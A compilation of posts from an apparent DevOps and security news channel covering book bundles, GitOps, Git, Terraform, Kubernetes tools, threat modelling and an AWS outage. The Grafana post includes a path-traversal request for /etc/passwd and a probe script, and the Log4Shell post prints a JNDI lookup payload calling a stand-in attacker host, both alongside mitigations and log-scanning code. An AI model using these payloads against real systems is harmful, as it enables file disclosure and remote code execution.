I have two book bundle recommendations today. I was wondering whether it makes sense to combine them into one message, but decided to post them separately.
So, the first one is a bundle of Python books by O'Reilly:
- Web Scraping with Python
- Test Driven Development with Python
- Using Asyncio in Python
- High Performance Python
- Introducing Python
- Think Python
- Hands-On Unsupervised Learning Using Python
- Python Data Science Handbook
- Thoughtful Machine Learning with Python
- Flask Web Development
- Machine Learning Pocket Reference
- Hitchhiker's Guide to Python
- Elegant SciPy
- NLP with Python
As usual, you can pay at least €15.55 to unlock all of these books, or pay less to unlock some of them. There's no upper limit, though: you can pay whatever you want, and Humble Bundle will redirect your funds to charity.
#books #python #programming
Humble Bundle
Humble Book Bundle: Python Programming by O'Reilly
We’ve teamed up with O’Reilly for our newest bundle. Get ebooks like Introducing Python, 2nd Edition & High Performance Python, 2nd Edition. Plus, pay what you want & support charity!
The next book bundle is about security.
- Microsoft Azure Security and Privacy Concepts
- Hack Yourself First: How to go on the Cyber-Offense
- Security in the Cloud
- Security Compliance: The Big Picture
- Security for Hackers and Developers: Overview
- Threats, Attacks, and Vulnerabilities for CompTIA Security+
- Incident Detection and Investigation with QRadar
- AWS Cloud Security Best Practices
- Microsoft 365 Security: Threat Protection Implementation and Management
- Cisco CyberOps: Security Monitoring
- Cloud Security: Introduction to Certified Cloud Security Professional (CCSP®)
- Linux Host Security
- Operationalizing Cyber Threat Intel: Pivoting & Hunting
- Security Awareness: Basic Concepts and Terminology
- Splunk Enterprise Security: Big Picture
- Threat Intelligence: Cyber Threats and Kill Chain Methodology
- Cyber Security Essentials: Your Role in Protecting the Company
- Security Management: A Case Study
- Security Awareness: Phishing - How Hackers Get Your Secrets
- Cyber Security Careers for IT Professionals
As usual, you can pay what you want. A minimum payment of €21.59 will unlock all 20 books.
#books #security
Humble Bundle
Humble Software Bundle: Cyber Security for Hackers and Developers
We’ve teamed up with Pluralsight for our newest bundle. Get software like Hack Yourself First: How to go on the Cyber-Offense & Security for Hackers and Developers: Overview. Plus, pay what you want & support charity!
An article about some attack vectors for your AWS environments and ways to protect yourself against them.
There's a neat tl;dr section at the top of the article, so you can get a quick overview before diving deeper.
#aws #security
tl;dr sec
Lesser Known Techniques for Attacking AWS Environments
Techniques for initial access, recon, lateral movement, and exfil of AWS accounts, along with defensive mitigations
From our subscribers.
The CNCF Application Delivery Technical Advisory Group has released v1.0.0 of the GitOps specification.
You can find the specification itself on GitHub.
Basically, a GitOps system should comply with 4 main principles (there's a toy sketch of a reconcile loop right after the list):
1. Declarative: A system managed by GitOps must have its desired state expressed declaratively.
2. Versioned and Immutable: Desired state is stored in a way that enforces immutability, versioning and retains a complete version history.
3. Pulled Automatically: Software agents automatically pull the desired state declarations from the source.
4. Continuously Reconciled: Software agents continuously observe the actual system state and attempt to apply the desired state.
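To make principles 3 and 4 a bit more tangible, here is a toy reconcile loop in Python. It's only a sketch: the repo URL and file layout are made up for illustration, and real agents (Flux, Argo CD, etc.) converge an actual cluster instead of writing a JSON file.

import json
import pathlib
import subprocess
import time

DESIRED_STATE_REPO = "https://example.com/org/desired-state.git"  # hypothetical config repo
CHECKOUT_DIR = pathlib.Path("/tmp/desired-state")
ACTUAL_STATE_FILE = pathlib.Path("/tmp/actual-state.json")        # stand-in for the real system

def pull_desired_state():
    # Principle 3: the agent pulls the declarative desired state from the source.
    if CHECKOUT_DIR.exists():
        subprocess.run(["git", "-C", str(CHECKOUT_DIR), "pull", "--ff-only"], check=True)
    else:
        subprocess.run(["git", "clone", DESIRED_STATE_REPO, str(CHECKOUT_DIR)], check=True)
    return json.loads((CHECKOUT_DIR / "desired.json").read_text())

def read_actual_state():
    # Stand-in for querying the real system (e.g. a cluster API).
    return json.loads(ACTUAL_STATE_FILE.read_text()) if ACTUAL_STATE_FILE.exists() else {}

def apply(desired):
    # Stand-in for converging the system towards the desired state.
    ACTUAL_STATE_FILE.write_text(json.dumps(desired))

while True:
    # Principle 4: continuously observe the actual state and reconcile.
    desired, actual = pull_desired_state(), read_actual_state()
    if desired != actual:
        apply(desired)
    time.sleep(30)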
You could kinda deduce these principles already, but now they're formalized. Besides, you can adopt these principles, and GitOps in general, not only for your services but for IaC as well.
There are still open questions, for example how to handle incidents in an immutable environment. However, I like the overall direction. Specifically the point that even though we switched from "pet" servers to "cattle" ones, we still treat environments as "pets", and we need to stop that.
I see demand for running dynamic environments increasing across the industry. So, this is definitely a valid point and an interesting area to explore.
#gitops #cicd #culture
The New Stack
CNCF Working Group Sets Some Standards for ‘GitOps’
Engineers from GitHub, Microsoft, CodeFresh, and other cloud native-savvy companies have banded together to assemble a set of definitions
Our tech stack differs from one company to another. However, there are certain things that almost everybody uses. Like, for example, Git!
Here are some release notes for Git 2.34.
This release introduces the use of the sparse index for some Git commands.
You can read more about sparse checkout and the sparse index here.
This is especially useful for monorepo users. Although I haven't been working with one for more than two years now, I have some repos in mind where I would like to test it.
As a bonus: An article about Git's data structures and their behavior. Commits are not diffs, folks!
#git
The GitHub Blog
Highlights from Git 2.34
To celebrate this most recent release, here's GitHub's look at some of the most interesting features and changes introduced since last time.
Ship / Show / Ask - A modern branching strategy
It's a branching strategy that combines the features of Pull Requests with the ability to keep shipping changes.
Changes are categorized as either:
- Ship (merge into mainline without review)
- Show (open a pull request for review, but merge into mainline immediately)
- Ask (open a pull request for discussion before merging)
From CatOps Chat
#github
martinfowler.com
Ship / Show / Ask
Ship/Show/Ask is a branching strategy that helps teams wait less and ship more, without losing out on feedback.
Discount on courses + free certification on CKA, CKS etc + swag
https://training.linuxfoundation.org/cyber-monday-2021/
#education #courses
Linux Foundation - Education
Our friends from Cossack Labs have released a new version of their Acra tool.
Acra is a database security suite for data protection. It provides application-level encryption for data fields, multi-layered access control, database leakage prevention, and intrusion detection capabilities in one suite. Acra was specifically designed for distributed apps (web, server-side, and mobile) that store data in one or many databases. Basically, you can encrypt individual fields completely transparently to the application!
So, what's special about this release? A lot of features that previously were available only in the enterprise version have now made their way into open source! Among them: database encryption, searchable encryption, and an encryption-as-a-service API.
Apart from that, Acra allows you to tokenize certain fields in your database to achieve anonymization. This is actually a cool feature! At one of my former companies we had to build our own tool for that; here you get it as part of the package.
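In case the term is new to you, here is a toy Python illustration of the tokenization idea itself. This is not Acra's API, just the general concept: sensitive values are swapped for random tokens before they reach the main database, and the token-to-value mapping lives in a separate, better-protected store.

import secrets

token_vault = {}  # in a real setup this mapping lives in a separate, protected service

def tokenize(value: str) -> str:
    # Replace a sensitive value with a random token and remember the mapping.
    token = secrets.token_hex(16)
    token_vault[token] = value
    return token

def detokenize(token: str) -> str:
    # Only callers with access to the vault can get the original value back.
    return token_vault[token]

email_token = tokenize("alice@example.com")
print(email_token)              # this is what gets stored in the main database
print(detokenize(email_token))  # alice@example.com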
#security #databases #toolz
On our last voice chat we briefly discussed Kubernetes autoscaling and mentioned Karpenter - a cluster autoscaler backed by AWS.
This tool isn’t new. However, but AWS started to promote it recently. So, it’s probably “production ready enough” from their judgment. Also, it looks like Karpenter can work with spot instances, which makes it a super-interesting tool to follow.
You can read more about it in the AWS blog post.
If you are already using it or you have tried it, feel free to share your opinions in our chat!
#kubernetes #scaling #toolz
This tool isn’t new. However, but AWS started to promote it recently. So, it’s probably “production ready enough” from their judgment. Also, it looks like Karpenter can work with spot instances, which makes it a super-interesting tool to follow.
You can read more about it in the AWS blog post.
If you are already using it or you have tried it, feel free to share your opinions in our chat!
#kubernetes #scaling #toolz
karpenter.sh
Just-in-time Nodes for Any Kubernetes Cluster
A short but insightful article by GitLab on how to perform threat modelling.
It covers some basics, like building diagrams, and describes the popular STRIDE framework for threat modelling.
STRIDE stands for:
- Spoofing - Impersonating something or someone else
- Tampering - Modifying data or code
- Repudiation - Claiming to have not performed an action
- Information disclosure - Exposing information to someone not authorized to see it
- Denial of service - Deny or degrade service to users
- Elevation of privilege - Gain capabilities without proper authorization
Here you can find a slightly more detailed description of each area with some examples.
P.S. In general, GitLab has a lot of great documentation and blog posts freely available, not only on security or operational topics but on various aspects of work. I strongly suggest checking out their handbook. Maybe you can find guidance there on topics that are important to you at the moment.
#security
GitLab
Threat Modeling HowTo
A howto for the threat modeling process at GitLab.
I'm a bit hesitant about posting hot news, because there are usually people who do that faster than me.
This one is worth mentioning, though. Grafana fixed a 0-day vulnerability that was discovered yesterday.
The vulnerability in a nutshell, in case you've missed it: you were able to access restricted locations with a query like this one:
/public/plugins/<PLUGIN>/../../../../../../../etc/passwd
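If you want a quick way to check one of your own instances, here is a minimal Python sketch. The base URL and the plugin id are assumptions (alertlist is one of the panel plugins that ships with Grafana); the point is only that a patched server should refuse to serve the traversal path.

import urllib.error
import urllib.request

GRAFANA_URL = "http://localhost:3000"  # your own instance
# Build the traversal path; urllib sends it as-is, without collapsing the "../" segments.
probe = GRAFANA_URL + "/public/plugins/alertlist/" + "../" * 8 + "etc/passwd"

try:
    with urllib.request.urlopen(probe) as resp:
        body = resp.read()
    print(f"Looks vulnerable: got {len(body)} bytes back. Upgrade!")
except urllib.error.HTTPError as err:
    print(f"Got HTTP {err.code}: looks patched (or the path is blocked).")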
Versions 8.3.1, 8.2.7, 8.1.8, and 8.0.7 were released recently and have a patch for this vulnerability. Make sure to upgrade!
#security
BleepingComputer
Grafana fixes zero-day vulnerability after exploits spread over Twitter
Open-source analytics and interactive visualization solution Grafana received an emergency update today to fix a high-severity, zero-day vulnerability that enabled remote access to local files.
Astrologists declare a week of application delivery.
So today, I want to share with you an article that touches on the problem of delivering infrastructure dependencies in the modern world.
The problem statement is that almost no application runs purely on its own, especially if we're talking about corporate backend services. These applications require databases, queues, blob storage, and many more dependencies to run correctly.
Who's responsible for that, though? Is it application developers? Well, in this case, they'll need to learn a bunch of things related to those topics, which likely doesn't make much sense from a business point of view. On the other hand, creating a separate team to provide dependencies on demand literally takes us a decade back to the "throwing code over the wall" and "ticket-based software delivery" approaches.
In this article, the author argues that bundling application dependencies alongside the codebase is the best way to go. One team can deliver these building blocks, and developers then combine them like Lego bricks in their config files.
This is a very interesting approach (at least for me) and I truly believe this will be the next big thing in the DevOps-ish world. For now, though, the author mentions a few tools that could help here. However, in my humble opinion, the existing toolset is not quite there yet and there is still a long way to go.
P.S. I wanted to write a real blog post on this topic as well. Unfortunately, I don't know how to motivate myself. Therefore, I would rather create a series of small Telegram posts on this topic. Stay tuned!
#app_bundle #kubernetes #crossplane
Danielmangum
Infrastructure in Your Software Packages
This post explores what a future of shipping infrastructure alongside software may look like by detailing where we are today, and evaluating how the delivery of software has evolved over time. If you just want the big ideas, skip to the final section: A New…
Terraform 1.1.0 was released, and maybe the most interesting feature is the ability to force variables to be non-null.
By default, all variables are implicitly set to nullable = true. Here's how to make them non-nullable:

# Non-nullable with a default: if left unset, or set explicitly to null,
# it takes on the default value.
# In this case, the module author can safely assume var.e will never be null.
variable "e" {
  nullable = false
  default  = "hello"
}

# Non-nullable with no default: the variable must be set, and cannot be null.
# In this case, the module author can safely assume var.d will never be null.
variable "d" {
  nullable = false
}

#terraform
A 0-day vulnerability was found in the popular Java log4j library.
Now, why is it important?
You may like Java or not, but it is a crazily popular programming language. Runs on billions of devices, bla-bla.
log4j is a very popular, if not the most popular, logging library for Java. If you have Java services in your landscape, and they write logs, chances are high they use log4j.
The exploit is stupidly simple. An attacker just needs a malicious server and arbitrary Java code that they want to execute on the victim's machine. Here's how it works:
1. Data from the user gets sent to the server (via any protocol),
2. The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker-controlled server),
3. The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via the "Java Naming and Directory Interface" (JNDI),
4. The response contains a path to a remote Java class file (e.g. https://second-stage.attacker.com/Exploit.class), which is injected into the server process,
5. This injected payload triggers a second stage and allows an attacker to execute arbitrary code.
It looks like the quickest mitigation is to set the -Dlog4j2.formatMsgNoLookups=true Java parameter for all your services if you're using log4j >= 2.10, or to re-configure the JDK.
Also, check your Java services' logs. Maybe you're already poisoned.
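If you want to do that check quickly, here is a rough Python sketch that greps log files for JNDI lookup strings. The log directory is an assumption (point it at wherever your services write logs), and attackers also use obfuscated payloads like ${${lower:j}ndi:...}, so an empty result is not a guarantee, but any hit deserves a closer look.

import pathlib
import re
import sys

# Matches ${jndi: ... as well as lightly obfuscated variants such as ${${lower:j}ndi:...
pattern = re.compile(r"\$\{.{0,30}?j.{0,5}?n.{0,5}?d.{0,5}?i.{0,30}?:", re.IGNORECASE)

log_dir = pathlib.Path(sys.argv[1] if len(sys.argv) > 1 else "/var/log/my-java-apps")
for log_file in log_dir.rglob("*.log"):
    for line_no, line in enumerate(log_file.read_text(errors="ignore").splitlines(), start=1):
        if pattern.search(line):
            print(f"{log_file}:{line_no}: {line.strip()[:200]}")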
#security #0day
GitLab issued new security releases: 14.5.2, 14.4.4, and 14.3.6
These releases contain patches for various security vulnerabilities, including one with High severity.
So, if you're running your own GitLab Community Edition (CE) or Enterprise Edition (EE), make sure to upgrade!
#gitlab #security
GitLab
GitLab Security Release: 14.5.2, 14.4.4, and 14.3.6
Learn more about GitLab Security Release: 14.5.2, 14.4.4, and 14.3.6 for GitLab Community Edition (CE) and Enterprise Edition (EE).
Amazon has published a public postmortem for the recent issues from Friday. However, it went a little bit unnoticed because of the Log4j story (see one of the previous posts).
So, the original issue happened to be a cascading failure, which led to congestion in AWS's internal network. This is the interesting part, because it sheds some light on AWS internals.
The internal monitoring system, as well as parts of the control plane for EC2, reside in the internal network that experienced issues. That's why the AWS team was operating with partial visibility into their systems, which impacted the speed of resolution.
Customer services were still running, but their control APIs were impacted. For example, your existing EC2 machines were there, but you could neither describe them nor start a new one. These matters happened to be more critical for certain services within AWS like API Gateway and Amazon Connect.
The interesting thing is that these events were caused by code that had been there for years (according to AWS). Unfortunately, unexpected behavior was revealed during an automated scaling event.
To mitigate such issues in the future, AWS switched off automatic scaling in us-east-1. They claim that they already have enough capacity, and they're working on a fix for the part of the code that caused the congestion in the first place. I assume there are many other internal action items from this outage as well.
#aws #postmortem
Last week, I promised a series of posts about modern application delivery. Last time, we briefly discussed the problems created by the disconnect between application code and its infrastructure dependencies.
Today, let's talk about a proposed formal way of solving this issue - the Open Application Model. This is a specification for an application bundle definition that contains all the required components as well as traits (more on those later). The main purpose is to provide a reasonable abstraction for customers, so they can use components and traits as building blocks for their application's infra dependencies.
This concept was proposed by people from Alibaba Cloud (and Microsoft?) and the whole thing is fairly new. However, it already has an implementation for Kubernetes - KubeVela. Although, I still have unanswered questions about this tool. For example, is it possible to provide default traits? What should I do if I want all my apps to have an autoscaler, etc.?
In any case, those are implementation details. Nothing stops you from embracing the concepts of OAM and implementing them using, let's say, Helm.
As a bonus, here is a great video by Viktor Farcic about KubeVela with a basic "Hello world" example. It helps to better understand the problem that OAM is trying to solve, as well as its concepts like components, traits, and the difference between them. 'Coz the official documentation, let's be honest, is not that great.
https://youtu.be/2CBu6sOTtwk
#oam #app_bundle #kubernetes
YouTube
Cloud-Native Apps With Open Application Model (OAM) And KubeVela
Can we define cloud-native applications without dealing with resources related to underlying platforms? One possible solution is to use the Open Application Model (OAM) combined with KubeVela.
#oam #kubevela #k8s #kubernetes #cloud-native
I don't know a corresponding idiom in English, so I put it as it is.
Наша пісня гарна й нова - починаймо її знову! (Roughly: "Our song is good and new - let's start it over again!")
The fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), to craft malicious input data using a JNDI Lookup pattern, resulting in a denial-of-service (DoS) attack.
P.S. If you know the corresponding idiom in English, please let me know in the chat.
#security
GitHub
CVE-2021-45046 - GitHub Advisory Database
Incomplete fix for Apache Log4j vulnerability
The Log4Shell exploit for the popular Log4j library has impacted a lot of Java services all over the globe, including the popular Elastic Stack.
Here is what you need to know about Log4j and Elasticsearch.
#security #elasticsearch
xeraa.net
Mitigate Log4j / Log4Shell in Elasticsearch (CVE-2021-44228)
What Log4j version are you using, what mitigations are already in place, and what should you do next. Continuously updated to cover CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832.
Holiday Book Recommendations by Gergely Orosz - the author of The Pragmatic Engineer blog.
A bit unfortunate for me that this article was published on the 17th of December, after I had already bought some engineering books before the end of the year (we have a special budget for that at my company). However, 4 out of 5 books I've bought are on this list :)
The only exception is Database Internals, but I guess this book is just too specific for a generic IT book recommendation.
So, I hope you can find something interesting for yourself in this list! There are multiple categories, from engineering management to technology-specific topics. Also, "The Pragmatic Engineer" is a really cool blog about IT in general, as well as some European specifics. I read it myself and can totally recommend it!
Happy upcoming holidays!
#books
The Pragmatic Engineer
Tech Books for the Holidays
Books perfect as reading or gifts during the end-of-year break for those working in tech. 95 book recommendations.
Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability
Tracked as CVE-2021-45105 (CVSS score: 7.5), the new vulnerability affects all versions of the tool from 2.0-beta9 to 2.16.0, which the open-source nonprofit shipped earlier this week to remediate a second flaw that could result in remote code execution (CVE-2021-45046), which, in turn, stemmed from an "incomplete" fix for CVE-2021-44228, otherwise called the Log4Shell vulnerability.
#security